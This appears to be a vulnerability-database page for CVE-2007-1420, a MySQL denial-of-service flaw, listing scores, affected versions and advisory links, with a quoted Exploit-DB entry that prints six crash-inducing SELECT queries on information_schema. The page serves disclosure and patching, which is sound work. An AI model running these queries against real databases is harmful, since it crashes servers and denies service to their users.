CVE-2007-1420 : Detail

CVE-2007-1420

2.67%V3
Local
2007-03-12
22h00 +00:00
2018-10-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

MySQL 5.x before 5.0.36 allows local users to cause a denial of service (database crash) by performing information_schema table subselects and using ORDER BY to sort a single-row result, which prevents certain structure elements from being initialized and triggers a NULL dereference in the filesort function.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 2.1 AV:L/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 29724

Publication date : 2007-03-08 23h00 +00:00
Author : S.Streichsbier
EDB Verified : Yes

source: https://www.securityfocus.com/bid/22900/info MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain select statements to database metadata. An attacker can exploit this issue to crash the application, denying access to legitimate users. The attacker may also be able to execute arbitrary code, but this has not yet been confirmed. NOTE: An attacker must be able to execute arbitrary SELECT statements on the vulnerable computer to exploit this issue. This may be through legitimate means or by exploiting other latent SQL-injection vulnerabilities. Versions prior to 5.0.36 are vulnerable. SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1)); SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns ORDER BY 1)); SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1); SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1)); SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1)); SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol');

Products Mentioned

Configuraton 0

Mysql>>Mysql >> Version To (including) 5.0.33

Mysql>>Mysql >> Version 5.0.0

Mysql>>Mysql >> Version 5.0.1

Mysql>>Mysql >> Version 5.0.2

Mysql>>Mysql >> Version 5.0.3

Mysql>>Mysql >> Version 5.0.4

Mysql>>Mysql >> Version 5.0.5

Mysql>>Mysql >> Version 5.0.10

Mysql>>Mysql >> Version 5.0.15

Mysql>>Mysql >> Version 5.0.16

Mysql>>Mysql >> Version 5.0.17

Mysql>>Mysql >> Version 5.0.20

Mysql>>Mysql >> Version 5.0.24

Mysql>>Mysql >> Version 5.0.30

Oracle>>Mysql >> Version 5.0.6

Oracle>>Mysql >> Version 5.0.7

Oracle>>Mysql >> Version 5.0.32

Oracle>>Mysql >> Version 5.0.41

References

http://secunia.com/advisories/25196
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/24609
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/25389
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/usn-440-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://security.gentoo.org/glsa/glsa-200705-11.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://securityreason.com/securityalert/2413
Tags : third-party-advisory, x_refsource_SREASON
http://secunia.com/advisories/25946
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2007/0908
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/24483
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1017746
Tags : vdb-entry, x_refsource_SECTRACK
http://www.mandriva.com/security/advisories?name=MDKSA-2007:139
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/30351
Tags : third-party-advisory, x_refsource_SECUNIA
http://bugs.mysql.com/bug.php?id=24630
Tags : x_refsource_CONFIRM
http://www.securityfocus.com/bid/22900
Tags : vdb-entry, x_refsource_BID
http://www.redhat.com/support/errata/RHSA-2008-0364.html
Tags : vendor-advisory, x_refsource_REDHAT